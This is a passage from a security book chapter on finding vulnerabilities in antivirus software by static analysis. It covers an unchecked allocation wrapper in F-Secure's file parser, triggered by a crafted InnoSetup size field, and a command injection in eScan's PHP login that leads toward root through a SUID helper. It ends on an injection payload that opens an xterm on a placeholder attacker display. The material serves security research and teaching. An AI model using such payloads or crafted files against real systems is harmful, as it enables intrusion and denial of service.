The Antivirus Hacker's Handbook (2015)

Part III. Analysis and Exploitation

In This Part

1. Chapter 12: Static Analysis

2. Chapter 13: Dynamic Analysis

3. Chapter 14: Local Exploitation

4. Chapter 15: Remote Exploitation

Chapter 12. Static Analysis

Static analysis is a research method used to analyze software without actually executing it. This method involves extracting all the information relevant to the analysis (such as finding bugs) using static means.

Analyzing code with static analysis is often done by reading its source code or the corresponding assembly in the case of closed-source products. Although this is, naturally, the most time-consuming technique used to analyze a piece of software, it offers the best results overall, because it forces the analyst to understand how the software works at the lower levels.

This chapter discusses how you can use static analysis techniques to discover vulnerabilities in antivirus software. It focuses on the de facto tool for static analysis, IDA.

Performing a Manual Binary Audit

Manual binary auditing is the process of manually analyzing the assembly code of the relevant binaries from a software product in order to extract artifacts from it. As an example, this chapter shows you how to manually audit an old version of F-Secure Anti-Virus for Linux with the aim of discovering some vulnerability that you could exploit remotely, such as a bug in the file format parsers. Fortunately for reverse-engineers, this antivirus product comes with symbolic information, which makes the static analysis audit easier.

When you have symbolic information, either because the program database (PDB) files are present for a Windows application or because DWARF debugging information is embedded in a Unix application, you can simply skip analyzing the functions whose purpose is already clear from their names. This saves you from reverse-engineering them and losing many precious work hours. If there is not enough symbolic information, especially about standard library functions (those found in the C runtime [CRT] library or LIBC, such as malloc, strlen, memcpy, and so on), then you can rely on IDA's “Fast Library Identification and Recognition Technology” (also known as FLIRT) to discover the function names for you. Often, even without any symbols, it is possible to deduce what a certain function does by forming a quick understanding of its general algorithm and purpose. As an example of the latter, I managed to avoid reverse-engineering a set of functions because I could directly identify them as being related to the RSA algorithm.

File Format Parsers

For experimentation and demonstration purposes, this chapter uses the antivirus product F-Secure Anti-Virus for Linux. After installing this product, you will have a few folders in the /opt/f-secure directory:

$ ls -l /opt/f-secure/

total 12

drwxrwxr-x 5 root root 4096 abr 19 2014 fsaua

drwxr-xr-x 3 root root 4096 abr 19 2014 fsav

drwxrwxr-x 10 root root 4096 abr 19 2014 fssp

From this directory listing, you might guess that the prefix fs means F-Secure and the suffix av means antivirus. If you take a look inside the second directory, you will discover that it contains almost exclusively symbolic links:

$ ls -l /opt/f-secure/fsav/bin/

total 4

lrwxrwxrwx 1 root root 48 abr 19 2014 clstate_generator -> /opt/f-secure/fsav/../fssp/bin/clstate_generator

lrwxrwxrwx 1 root root 45 abr 19 2014 clstate_update -> /opt/f-secure/fsav/../fssp/bin/clstate_update

lrwxrwxrwx 1 root root 49 abr 19 2014 clstate_updated.rc -> /opt/f-secure/fsav/../fssp/bin/clstate_updated.rc

lrwxrwxrwx 1 root root 39 abr 19 2014 dbupdate -> /opt/f-secure/fsav/../fssp/bin/dbupdate

lrwxrwxrwx 1 root root 44 abr 19 2014 dbupdate_lite -> /opt/f-secure/fsav/../fssp/bin/dbupdate_lite

lrwxrwxrwx 1 root root 35 abr 19 2014 fsav -> /opt/f-secure/fsav/../fssp/bin/fsav

lrwxrwxrwx 1 root root 37 abr 19 2014 fsavd -> /opt/f-secure/fsav/../fssp/sbin/fsavd

lrwxrwxrwx 1 root root 37 abr 19 2014 fsdiag -> /opt/f-secure/fsav/../fssp/bin/fsdiag

lrwxrwxrwx 1 root root 42 abr 19 2014 licensetool -> /opt/f-secure/fsav/../fssp/bin/licensetool

-rwxr--r-- 1 root root 291 abr 19 2014 uninstall-fsav

Because of where the symbolic links point, it seems that the interesting directory is fssp:

$ ls -l /opt/f-secure/fssp/

total 32

drwxrwxr-x 2 root root 4096 abr 19 2014 bin

drwxrwxr-x 2 root root 4096 ene 30 2014 databases

drwxrwxr-x 2 root root 4096 abr 19 2014 etc

drwxrwxr-x 3 root root 4096 abr 19 2014 lib

drwxrwxr-x 2 root root 4096 abr 19 2014 libexec

drwxrwxr-x 2 root root 4096 abr 19 2014 man

drwxrwxr-x 2 root root 4096 abr 19 2014 modules

drwxrwxr-x 2 root root 4096 abr 19 2014 sbin

Great! This directory includes the databases, the program directories (bin and sbin), some library directories (lib and libexec), the man pages, and the modules directory. Take a look at the lib directory and see if you can discover a library or set of libraries containing the code that handles file formats:

$ ls -l /opt/f-secure/fssp/lib

total 3112

-rw-r--r-- 1 root root 2475 nov 19 2013 fsavdsimple.pm

-rwxr-xr-x 1 root root 252111 nov 19 2013 fsavdsimple.so

-rw-r--r-- 1 root root 32494 ene 30 2014 fssp-common

-rwxr-xr-x 1 root root 244324 ene 30 2014 libdaas2.so

-rwxr-xr-x 1 root root 123748 ene 30 2014 libdaas2tool.so

-rwxr-xr-x 1 root root 1606472 ene 30 2014 libfm.so

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so -> libfsavd.so.7.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.4 -> libfsavd.so.4.0.0

-rwxr-xr-x 1 root root 66680 ene 30 2014 libfsavd.so.4.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.5 -> libfsavd.so.5.0.0

-rwxr-xr-x 1 root root 70744 ene 30 2014 libfsavd.so.5.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.6 -> libfsavd.so.6.0.0

-rwxr-xr-x 1 root root 74872 ene 30 2014 libfsavd.so.6.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.7 -> libfsavd.so.7.0.0

-rw-r--r-- 1 root root 79040 nov 19 2013 libfsavd.so.7.0.0

lrwxrwxrwx 1 root root 13 abr 19 2014 libfsclm.so -> libfsclm.so.2

lrwxrwxrwx 1 root root 18 abr 19 2014 libfsclm.so.2 -> libfsclm.so.2.2312

-rwxr-xr-x 1 root root 309724 may 21 2013 libfsclm.so.2.2312

lrwxrwxrwx 1 root root 20 abr 19 2014 libfsmgmt.2.so -> libmgmtfile.2.0.0.so

lrwxrwxrwx 1 root root 17 abr 19 2014 libfssysutil.so -> libfssysutil.so.0

-rwxr-xr-x 1 root root 27272 ene 30 2014 libfssysutil.so.0

-rwxr-xr-x 1 root root 44532 ene 30 2014 libkeycheck.so

-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfile.2.0.0.so

lrwxrwxrwx 1 root root 20 abr 19 2014 libmgmtfile.2.so -> libmgmtfile.2.0.0.so

-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfsma.2.0.0.so

-rw-rw-r-- 1 root root 2386 ene 23 2014 libosid

-rw-r--r-- 1 root root 96312 nov 26 2013 libsubstatus.1.1.0.so

lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.1.so -> libsubstatus.1.1.0.so

lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.so -> libsubstatus.1.1.0.so

-rw-rw-r-- 1 root root 2696 ene 23 2014 safe_rm

drwxrwxr-x 2 root root 4096 abr 19 2014 x86_64

There are many libraries, but one of them should catch your attention because it is bigger than the other ones: libfm.so. Run the command nm -B to determine whether you have an interesting symbol:

$ LANG=C nm -B /opt/f-secure/fssp/lib/libfm.so

nm: /opt/f-secure/fssp/lib/libfm.so: no symbols

It seems there is no symbol. However, you may have another interesting source of symbolic information: the list of exported symbols. This time, run the readelf -Ws command:

$ LANG=C readelf -Ws libfm.so | more

Symbol table '.dynsym' contains 3820 entries:

Num: Value Size Type Bind Vis Ndx Name

0: 00000000 0 NOTYPE LOCAL DEFAULT UND

1: 00042354 0 SECTION LOCAL DEFAULT 8

2: 0004a0ac 0 SECTION LOCAL DEFAULT 10

3: 001331f0 0 SECTION LOCAL DEFAULT 11

4: 00133220 0 SECTION LOCAL DEFAULT 12

5: 00139820 0 SECTION LOCAL DEFAULT 13

6: 00139828 0 SECTION LOCAL DEFAULT 14

7: 00161aa4 0 SECTION LOCAL DEFAULT 15

8: 00169098 0 SECTION LOCAL DEFAULT 16

9: 001690a0 0 SECTION LOCAL DEFAULT 17

10: 001690a8 0 SECTION LOCAL DEFAULT 18

11: 001690c0 0 SECTION LOCAL DEFAULT 19

12: 0016c280 0 SECTION LOCAL DEFAULT 23

13: 00187120 0 SECTION LOCAL DEFAULT 24

14: 000d29dc 364 FUNC GLOBAL DEFAULT 10 _ZN21CMfcMultipartBodyPartD2Ev

15: 0006e034 415 FUNC GLOBAL DEFAULT 10 _Z20LZ_CloseArchivedFileP11LZFileDataIP14LZArchiveEntry

16: 000bd8b0 92 FUNC GLOBAL DEFAULT 10 _ZNK16CMfcBasicMessage7SubtypeEv

17: 00000000 130 FUNC GLOBAL DEFAULT UND __cxa_guard_acquire@CXXABI_1.3 (2)

18: 00000000 136 FUNC GLOBAL DEFAULT UND __cxa_end_catch@CXXABI_1.3 (2)

19: 0006f21c 647 FUNC GLOBAL DEFAULT 10 _Z13GZIPListFilesP11LZFileDataIP7GZ_DATA

20: 000e42c6 399 FUNC GLOBAL DEFAULT 10 _ZNK12CMfcDateTime6_ParseEb

21: 000e0ce8 80 FUNC GLOBAL DEFAULT 10 _ZN10FMapiTableD2Ev

22: 000a8a6c 163 FUNC GLOBAL DEFAULT 10 _ZN13SISUnArchiver12uninitializeEv

(…)

Wow! This reveals a lot of symbols (3,820 entries according to readelf). The symbol names are mangled, but IDA can show them unmangled. Having such a large number of symbols will definitely make it easier to reverse-engineer this library. To begin, filter the results to determine whether this library is the one responsible for parsing file formats, unpacking compressed files, or performing other relevant tasks:

$ LANG=C readelf -Ws libfm.so | egrep -i "(packer|compress|gzip|bz2)" | more

19: 0006f21c 647 FUNC GLOBAL DEFAULT 10 _Z13GZIPListFilesP11LZFileDataIP7GZ_DATA

41: 000af770 47 FUNC GLOBAL DEFAULT 10 _ZN17LzmaPackerDecoderD1Ev

47: 000ae0c8 7 FUNC WEAK DEFAULT 10 _ZN20HydraUnpackerContext13confirmActionEjPc

55: 000a2ae8 169 FUNC GLOBAL DEFAULT 10 _ZN29FmPackerManagerImplementation18packerFindNextFileEiP17FMFINDDATA_struct

59: 000b1b04 7 FUNC WEAK DEFAULT 10 _ZN19FmUnpackerInstaller28packerQueryArchiveMagicBytesERSt6vectorI13ArchMagicByteSaIS1_EEm

75: 000adff4 11 FUNC WEAK DEFAULT 10 _ZNK20HydraUnpackerContext12FmFileReader13getFileStatusEv

78: 000a5724 54 FUNC GLOBAL DEFAULT 10 _ZN14FmUnpackerCPIOD0Ev

83: 00134878 15 OBJECT WEAK DEFAULT 12 _ZTS12FmUnpacker7z

84: 000a15d8 54 FUNC GLOBAL DEFAULT 10 packerGetFileStat

94: 000adba4 7 FUNC GLOBAL DEFAULT 10 _ZN14FmUnpackerSisX15packerWriteFileEPvS0_lPKvmPm

122: 000a1948 7 FUNC GLOBAL DEFAULT 10

(…)
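The same triage can be scripted when you want to repeat it across several libraries. The following is a minimal sketch in Python, not part of the original workflow: it applies the same keyword filter to a handful of the names printed above and recovers the readable class and function names from the length-prefixed components of the mangled symbols. The helper names (qualified_name, interesting) are hypothetical, and the decoder deliberately ignores argument types, templates, and constructor or destructor markers, so it is no substitute for IDA's or c++filt's demangler.

```python
import re

# A few of the mangled names printed by readelf above.
SYMBOLS = [
    "_Z13GZIPListFilesP11LZFileDataIP7GZ_DATA",
    "_ZN17LzmaPackerDecoderD1Ev",
    "_ZN20HydraUnpackerContext13confirmActionEjPc",
    "_ZNK16CMfcBasicMessage7SubtypeEv",
    "packerGetFileStat",
]

# Same keywords as the egrep filter used in the text.
KEYWORDS = re.compile(r"(packer|compress|gzip|bz2)", re.IGNORECASE)


def qualified_name(symbol):
    """Return the scope-qualified name encoded in a mangled C++ symbol.

    Only the length-prefixed name components are decoded; everything
    after them (argument types, destructor markers, ...) is dropped.
    """
    if not symbol.startswith("_Z"):
        return symbol  # plain C symbol, nothing to decode
    pos = 2
    nested = symbol[pos:pos + 1] == "N"
    if nested:
        pos += 1
        # Skip cv-qualifiers such as K (const member function).
        while symbol[pos:pos + 1] in ("K", "V", "r"):
            pos += 1
    parts = []
    while True:
        match = re.match(r"\d+", symbol[pos:])
        if not match:
            break
        length = int(match.group())
        pos += match.end()
        parts.append(symbol[pos:pos + length])
        pos += length
        if not nested:
            break  # a non-nested name has a single component
    return "::".join(parts)


def interesting(symbols):
    """Keep only the symbols that match the keyword filter, decoded."""
    return [qualified_name(s) for s in symbols if KEYWORDS.search(s)]


for name in interesting(SYMBOLS):
    print(name)
```

Running the sketch lists only the packer-related and GZIP-related names from the sample, which is the same signal the egrep output gives.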

Bingo! It seems that the code for compressed file formats, packers, and so on is implemented in this library. Launch IDA and open this library. After the initial auto-analysis, the Functions window is populated with the unmangled names, as shown in Figure 12.1.

Screenshot of the “library libfm.so” in IDA window. Function names are listed in the left pane. IDA View-A tab is displayed on the right pane presenting codes.

Figure 12.1 The library libfm.so opened in IDA Pro

As you can see in the list of functions on the left side, a lot of functions have useful names, but what is the next step? Typically, when I begin a new project with the aim of discovering vulnerabilities, I start by finding the interesting memory management functions of the application (malloc, free, and similar functions) and start digging from that point. On the left side, in the Functions window, click the Function Name header to sort the function listings by name, and then search for the first match for a function containing the word malloc. In this example, two listings have the name FMAlloc(uint). One is the thunk function and the other is the actual function implementation. The function implementation is referenced by the thunk function and the Global Offset Table (GOT), while the thunk function is referenced by the rest of the program. Press the X key on the thunk function to show its cross references, as shown in Figure 12.2.

Screenshot of the “xrefs to FMAlloc(uint)” dialog with a list of code references. Code address “D…p FMSzAlloc:: Alloc(uint)+72” and text “call _Z7FMAllocj:FMAlloc(uint)” are selected.

Figure 12.2 Find the code references to FMAlloc(uint).

You have a total of 248 code references to this function, which is effectively a malloc wrapper function. It is now time to analyze the function FMAlloc to see how it works.

By looking at FMAlloc's disassembly, you can see that it starts by loading a function pointer from a global structure and checking whether that pointer is NULL. The pointer is apparently meant to point to a malloc-like allocation function:

.text:0004D76C ; _DWORD __cdecl FMAlloc(size_t n)

.text:0004D76C public _Z7FMAllocj

.text:0004D76C _Z7FMAllocj proc near ; CODE XREF: FMAlloc(uint)j

.text:0004D76C n = dword ptr 8

.text:0004D76C

.text:0004D76C push ebp

.text:0004D76D mov ebp, esp

.text:0004D76F push edi

.text:0004D770 push esi

.text:0004D771 push ebx

.text:0004D772 sub esp, 0Ch

.text:0004D775 call $+5

.text:0004D77A pop ebx

.text:0004D77B add ebx, 11CBAEh

.text:0004D781 mov eax, ds:(g_fileio_ptr - 16A328h)[ebx]

; My guess is that it's returning a pointer to "malloc".

.text:0004D787 mov eax, [eax+24h]

; Is the pointer to malloc NULL?

.text:0004D78A test eax, eax

.text:0004D78C mov edi, [ebp+n]

.text:0004D78F jz short loc_4D7B0
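The call $+5 / pop ebx / add ebx sequence at the start of the listing is how this position-independent code finds its data. The arithmetic can be checked by hand or with a few lines of Python; the sketch below uses only the addresses shown in the listing. Calling the result the GOT base is an assumption based on how 32-bit PIC code usually works; the listing itself only shows that IDA subtracts 16A328h in the operand.

```python
# Values copied from the FMAlloc listing above.
FUNC_START = 0x4D76C     # first instruction of FMAlloc
POPPED_ADDRESS = 0x4D77A  # return address pushed by "call $+5", popped into EBX
ADD_CONSTANT = 0x11CBAE   # constant added to EBX
JZ_ADDRESS = 0x4D78F      # address of the "jz short loc_4D7B0" instruction

# EBX after the "add": presumably the GOT base (assumption, see lead-in).
ebx = (POPPED_ADDRESS + ADD_CONSTANT) & 0xFFFFFFFF
print(hex(ebx))

# Offset of the jz inside the function, as used in IDA's cross-reference
# comment "CODE XREF: FMAlloc(uint)+23j" on loc_4D7B0.
print(hex(JZ_ADDRESS - FUNC_START))
```

The first value matches the 16A328h that IDA shows in the operand ds:(g_fileio_ptr - 16A328h)[ebx], which confirms that the instruction at 0x4D781 reads the global g_fileio_ptr.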

If the function pointer loaded at 0x4D787 is not NULL, execution continues normally with the next instruction; otherwise, the branch to 0x4D7B0 is taken. If you follow this jump, you discover the following code:

.text:0004D7B0 loc_4D7B0: ; CODE XREF: FMAlloc(uint)+23j

.text:0004D7B0 sub esp, 0Ch

.text:0004D7B3 push edi ; size

.text:0004D7B4 call _malloc

.text:0004D7B9 add esp, 0Ch

.text:0004D7BC push edi ; n

.text:0004D7BD push 0 ; c

.text:0004D7BF push eax ; s

.text:0004D7C0 mov esi, eax

.text:0004D7C2 call _memset

.text:0004D7C7 lea esp, [ebp-0Ch]

.text:0004D7CA pop ebx

.text:0004D7CB mov eax, esi

.text:0004D7CD pop esi

.text:0004D7CE pop edi

.text:0004D7CF leave

.text:0004D7D0 retn

.text:0004D7D0 _Z7FMAllocj endp

This part of the code allocates as much memory as the function's argument specifies (the size is stored in the EDI register and pushed at 0x4D7B3). Then, it calls memset on the pointer returned by malloc to initialize the buffer with 0x00 bytes. There are at least two bugs here. The first one is that there is no check for invalid allocation sizes before they are passed to malloc. You can pass -1, which is interpreted as 0xFFFFFFFF in a 32-bit application or 0xFFFFFFFFFFFFFFFF in a 64-bit application, so the function tries to allocate 4GB on 32-bit or 16EiB (exbibytes) on 64-bit platforms. Such a request simply fails, because it asks for the entire virtual memory range that can be addressed. You can also pass zero: the C standard leaves the result implementation-defined, and common implementations such as glibc return a valid pointer to a minimal block, so writing to that allocation as if it had a useful size risks corrupting the heap metadata or other previously allocated memory blocks.

The second bug is even easier to spot: there is no check at all after the malloc call to determine whether it failed. So, if you can pass an invalid size (such as –1), it causes the malloc function to fail (by returning a null pointer). Then, FMAlloc continues by calling memset to clear the newly allocated memory pointer. This entire function call is then equivalent to memset(nullptr, 0x00, size_t(-1)), resulting in an access violation exception or a segfault (segmentation fault).
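To see the failure mode without crashing anything, you can ask the C library for the same impossible allocation from Python through ctypes. The sketch below is an illustration only: checked_alloc and the MAX_ALLOC cap are hypothetical and are not taken from F-Secure's code or from the vendor's fix. It assumes a POSIX system where the C library can be loaded this way, and it never calls memset on a null pointer.

```python
import ctypes
import ctypes.util

# Load the C library (assumes a POSIX system such as Linux).
libc = ctypes.CDLL(ctypes.util.find_library("c") or None)
libc.malloc.restype = ctypes.c_void_p
libc.malloc.argtypes = [ctypes.c_size_t]
libc.memset.restype = ctypes.c_void_p
libc.memset.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_size_t]
libc.free.restype = None
libc.free.argtypes = [ctypes.c_void_p]

SIZE_MAX = ctypes.c_size_t(-1).value  # what (size_t)-1 becomes on this platform
MAX_ALLOC = 64 * 1024 * 1024          # hypothetical sanity cap for a parser


def checked_alloc(n):
    """Zero-initialized allocation with the two checks FMAlloc lacks."""
    if n == 0 or n > MAX_ALLOC:
        return None            # reject sizes no sane file field should hold
    ptr = libc.malloc(n)
    if not ptr:
        return None            # malloc failed: do NOT touch the pointer
    libc.memset(ptr, 0, n)
    return ptr


# The unchecked request made by FMAlloc when the size is -1.
raw = libc.malloc(SIZE_MAX)
print("malloc(SIZE_MAX) returned:", raw)

# The checked wrapper refuses the request instead of writing to NULL.
print("checked_alloc(SIZE_MAX) returned:", checked_alloc(SIZE_MAX))
```

ctypes represents a null pointer returned through c_void_p as None, so the first call shows directly that malloc failed; FMAlloc would pass that null pointer straight to memset.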

Okay, so you discovered your first bug in the F-Secure libfm.so library. What is your next step? It is time to discover whether the function FMAlloc is called with unsanitized input that is user controlled. Such input typically comes from an input file: while the file format is parsed, some fields are read and passed to FMAlloc without further sanitization or checks. A size field in a file format that is read and used to allocate memory using FMAlloc is therefore an interesting target. The function InnoDecoder::IsInnoNew, which is one of the many cross-references to FMAlloc, is an example of that. In this function, there are a few calls to initialize internal structures and to read the DOS header of an InnoSetup-compressed executable, the PE header, and other headers, as well as InnoSetup's own header. After such function calls, you have the following code:

.text:F72E5743 jz short loc_F72E57B1

.text:F72E5745 sub esp, 0Ch

.text:F72E5748 push [ebp+n] ; n

.text:F72E574E call __Z7FMAllocj ; FMAlloc(uint)

.text:F72E5753 add esp, 10h

.text:F72E5756 test eax, eax

.text:F72E5758 mov [ebp+s], eax

.text:F72E575E jz short loc_F72E57B1

.text:F72E5760 push ecx

.text:F72E5761 push [ebp+n] ; n

.text:F72E5767 push 0 ; c

.text:F72E5769 push eax ; s

.text:F72E576A call _memset

.text:F72E576F add esp, 10h

This code calls FMAlloc, passing the argument n. It so happens that n is actually read directly from the file buffer, so by simply setting the 32-bit unsigned value of the corresponding field in the input file to 0xFFFFFFFF (–1), you trigger the bug you just uncovered. To test this bug, you have to create (or download) an InnoSetup installer and modify the field in question to the value 0xFFFFFFFF. When a vulnerable (old) version of F-Secure Anti-Virus analyzes such a file, it crashes because it attempts to write to a null pointer.
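Patching such a field is a matter of overwriting four bytes. The following Python sketch shows the idea on an in-memory buffer. FIELD_OFFSET is a placeholder: the text does not give the position of the size field in the InnoSetup header, so you have to locate it yourself. The little-endian byte order is an assumption based on the x86 executable format.

```python
import struct

FIELD_OFFSET = 0x10  # hypothetical offset; locate the real size field yourself


def read_u32(data, offset):
    """Read an unsigned 32-bit little-endian value from the buffer."""
    return struct.unpack_from("<I", data, offset)[0]


def patch_u32(data, offset, value):
    """Return a copy of the buffer with a 32-bit field overwritten."""
    if offset < 0 or offset + 4 > len(data):
        raise ValueError("offset outside the buffer")
    return data[:offset] + struct.pack("<I", value & 0xFFFFFFFF) + data[offset + 4:]


# Stand-in for the bytes of a real installer file.
sample = bytes(32)
patched = patch_u32(sample, FIELD_OFFSET, -1)
print(hex(read_u32(patched, FIELD_OFFSET)))
```

With a real sample you would read the file with open(path, "rb"), patch the buffer, and write the result to a new file before scanning it in a test environment.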

You have just discovered an easy remote denial-of-service (DoS) attack vector in the InnoSetup installer files analyzer code of F-Secure, and that is because of a buggy malloc wrapper function. The InnoDecoder::IsInnoNew function is just one vulnerable function. There were many more, such as LoadNextTarFilesChunk, but according to the vendor they are now all fixed. As an exercise, you can verify whether this is true.

Remote Services

Static analysis can be applied to any other source code listing and not just a disassembler code listing. For example, this section covers a bug in eScan Antivirus for Linux that can be discovered by statically analyzing the PHP source code of the management web application. It took one hour to discover this vulnerability by taking a look at the installed components. eScan Antivirus for Linux consists of the following components:

· A multiple antivirus scanner using the kernels of both Bitdefender and ClamAV

· An HTTP server (powered by Apache)

· A PHP application for management

· A set of other native Executable and Linkable Format (ELF) programs

These components must be installed separately using the appropriate DEB package (for Ubuntu or other Debian-based Linux distributions). The vulnerable package versions of this product are shown here:

· escan-5.5-2.Ubuntu.12.04_x86_64.deb

· mwadmin-5.5-2.Ubuntu.12.04_x86_64.deb

· mwav-5.5-2.Ubuntu.12.04_x86_64.deb

You do not need to install the packages to perform static analysis for the purpose of finding vulnerabilities. You just need to unpack the files and take a look at the PHP sources. However, naturally, to test for possible vulnerabilities, you need to have the product deployed and running, so you should install it anyway.

The command to install the eScan DEB packages in Debian-based Linux distributions is $ dpkg -i *.deb.

After you install the application, a set of directories, applications, and so on are installed in the directory /opt/MicroWorld, as shown here:

$ ls /opt/MicroWorld/

bin etc lib sbin usr var

When auditing local applications, it is always worth looking for SUID/SGID files (see Chapter 10 for more information). In the case of this specific application, even though the attack surface is remote, you should also check for SUID/SGID files, for a reason that will be explained later on. The command you can issue in Linux or Unix to find SUID files is as follows:

$ find /opt/MicroWorld -perm -4000

/opt/MicroWorld/sbin/runasroot

This command reveals that the program runasroot is SUID. According to its name, the purpose of this program is clear: to run as root the commands that are passed to it. However, not all users can run it, only the users root and mwconf (a user created during the installation). The PHP web application, running under the context of the installed web server, runs as this user. This means that if you manage to find a remote code execution bug in the PHP web application, you can simply run commands as root, because the user mwconf is allowed to execute the SUID application runasroot. If you can manage to find such a bug, it would be extremely cool.
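If you prefer to script this check, for example to compare several unpacked packages, the same test can be written with the standard library. The function below is a minimal sketch (find_suid is a hypothetical name): it walks a directory tree and reports regular files that have the set-user-ID bit set, which is the condition the find command above tests.

```python
import os
import stat


def find_suid(root):
    """Return the sorted paths of regular files under root with the SUID bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # do not follow symbolic links
            except OSError:
                continue             # unreadable entry, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


# Prints nothing if the product is not installed on this machine.
for path in find_suid("/opt/MicroWorld"):
    print(path)
```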

Take a look at the PHP application installed in the directory /opt/MicroWorld/var/www/htdocs/:

$ find /opt -name "*.php"

/opt/MicroWorld/var/www/htdocs/index.php

/opt/MicroWorld/var/www/htdocs/preference.php

/opt/MicroWorld/var/www/htdocs/online.php

/opt/MicroWorld/var/www/htdocs/createadmin.php

/opt/MicroWorld/var/www/htdocs/leftmenu.php

/opt/MicroWorld/var/www/htdocs/help_contact.php

/opt/MicroWorld/var/www/htdocs/forgotpassword.php

/opt/MicroWorld/var/www/htdocs/logout.php

/opt/MicroWorld/var/www/htdocs/mwav/index.php

/opt/MicroWorld/var/www/htdocs/mwav/crontab.php

/opt/MicroWorld/var/www/htdocs/mwav/action.php

/opt/MicroWorld/var/www/htdocs/mwav/selections.php

/opt/MicroWorld/var/www/htdocs/mwav/savevals.php

/opt/MicroWorld/var/www/htdocs/mwav/status_Updatelog.php

/opt/MicroWorld/var/www/htdocs/mwav/header.php

/opt/MicroWorld/var/www/htdocs/mwav/readvals.php

/opt/MicroWorld/var/www/htdocs/mwav/manage_admins.php

/opt/MicroWorld/var/www/htdocs/mwav/logout.php

/opt/MicroWorld/var/www/htdocs/mwav/AV_vdefupdates.php

/opt/MicroWorld/var/www/htdocs/mwav/login.php

/opt/MicroWorld/var/www/htdocs/mwav/main.php

/opt/MicroWorld/var/www/htdocs/mwav/crontab_mwav.php

/opt/MicroWorld/var/www/htdocs/mwav/main_functions.php

/opt/MicroWorld/var/www/htdocs/mwav/update.php

/opt/MicroWorld/var/www/htdocs/mwav/status_AVfilterlog.php

/opt/MicroWorld/var/www/htdocs/mwav/topbar.php

/opt/MicroWorld/var/www/htdocs/common_functions.php

/opt/MicroWorld/var/www/htdocs/login.php

(…)

Notice that there are a lot of PHP files. If you open the file index.php (the very first page that is usually served by the web server), you will discover that it is not very exciting. However, inside it, there is a section of code that references the PHP script login.php:

(…)

<form method="post" action="login.php">

<table class="tabledata" width="400" class="center"

cellspacing="5">

(…)

Now open the file and check how it performs authentication. Perhaps you can find some way to bypass it. It starts by checking whether the CGI REQUEST_METHOD is GET; if it is, the script redirects to index.php, so only other methods (such as POST) reach the authentication code:

(…)

<?php

include("common_functions.php");

// code for detection of javascript and cookie support in client browser

if(strpos($_SERVER["REQUEST_METHOD"],"GET") !== false )

{

header("Location: index.php");

exit();

}

(…)

Then, a set of checks for actions is performed that is completely irrelevant to your purposes. It is worth noting, however, how $runasroot is referenced:

(…)

$passwdFile="/opt/MicroWorld/etc/passwd";

$product=trim($_POST['product_name']);

$username=trim($_POST['uname']);

$passwd = trim($_POST["pass"]);

$language = $_POST["language"];

$conffile = "/opt/MicroWorld/etc/auth.conf";

$auth_conf = false;

if(file_exists($conffile))

{

Upgrade_Old_Auth_Conf($conffile);

$auth_conf = MW_readConf($conffile, "#", '', '"');

}

else

{

$auth_conf = array();

$auth_conf['auth']['type'] = 0;

exec("$runasroot /bin/touch $conffile");

exec("$runasroot /bin/chown mwconf:mwconf $conffile");

MW_writeConf($auth_conf,$conffile,"",'"');

}

(…)

The PHP script reads some interesting fields from the parameters sent to the PHP application (uname, short for user name, and pass, short for password), and, more interestingly, it calls exec() with a command line built from $runasroot and some variables. However, $conffile is hard-coded in the PHP application, so you cannot influence it. Can you somehow influence any other exec() call that uses $runasroot? If you continue to analyze this PHP file, you will discover a suspicious check:

(…)

$retval = check_user($username, "NULL", $passwdFile, "NULL");

list($k,$v)=explode("-",$retval);

if($v != 0 )

{

header("Location: index.php?err_msg=usernotexists");

exit();

}

elseif( strlen($passwd)<5 )

{

header("Location: index.php?err_msg=password_len");

exit();

}

elseif( preg_match("/[|&)(!><\'\"` ]/", $passwd) )

{

header("Location: index.php?err_msg=password_chars");

exit();

}

else

{

$retval=check_user($username,$passwd,$passwdFile,"USERS");

list($k,$v)=explode("-",$retval);

if($v == 0)

{

$retval=check_user($username,$passwd,$passwdFile,$product);

list($k,$v)=explode("-",$retval);

if($v == 0)

(…)

Do you see the preg_match call? It rejects the password if it contains any of the following characters: | & ) ( ! > < ' " ` or the space character. At first glance, you might guess that this call filters out typical command injections based on shell metacharacters. However, if that is the case, then it forgot to filter at least one more important character: the semicolon (;). Follow the control flow of this PHP script to see whether the $passwd argument sent from the client is actually used and passed to some kind of operating system command. Eventually, if all the checks are passed, the script calls the function check_user with the password. Running a grep search for it, you discover that it is implemented in the PHP script common_functions.php. If you open this file and go to the implementation of the check_user function, you discover the following:

(…)

function check_user($uname, $password, $passfile, $product)

{

// name and path of the binary

$prog = "/opt/MicroWorld/sbin/checkpass";

$runasroot = "/opt/MicroWorld/sbin/runasroot";

unset($output);

unset($ret);

// name and path of the passwd file

$out= exec("$runasroot $prog $uname $password $passfile $product",$output,$ret);

$val = $output[0]."-".$ret;

return $val;

}

(…)

Beautiful! The user-supplied password field is concatenated into a command line and executed via the PHP function exec(), which hands the string to the shell. Shell metacharacters that survive the filter are therefore interpreted, which makes it possible to execute any operating system command. However, because the semicolon acts as a command separator, the injected command is processed not by the SUID binary runasroot but by the shell itself, so it runs as mwconf, the user running the web application. As a result, you can inject a command, but you cannot directly run code as root. Fortunately, as you previously discovered, mwconf is allowed to execute the runasroot SUID executable, so root is only one step away.
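The effect of the concatenation is easier to see when the command line is written out. The Python sketch below mirrors the string that check_user builds and splits it on semicolons, which is a simplification of what the shell does with an unquoted string (the shell's real parsing rules are richer). For contrast, it also builds the command with every argument quoted by shlex.quote, a standard-library function; this contrast is an illustration and not the vendor's fix. The function names and the sample username are hypothetical.

```python
import shlex

RUNASROOT = "/opt/MicroWorld/sbin/runasroot"
PROG = "/opt/MicroWorld/sbin/checkpass"
PASSFILE = "/opt/MicroWorld/etc/passwd"
PAYLOAD = ";DISPLAY=YOURIP:0;xterm;"  # value sent in the "pass" field


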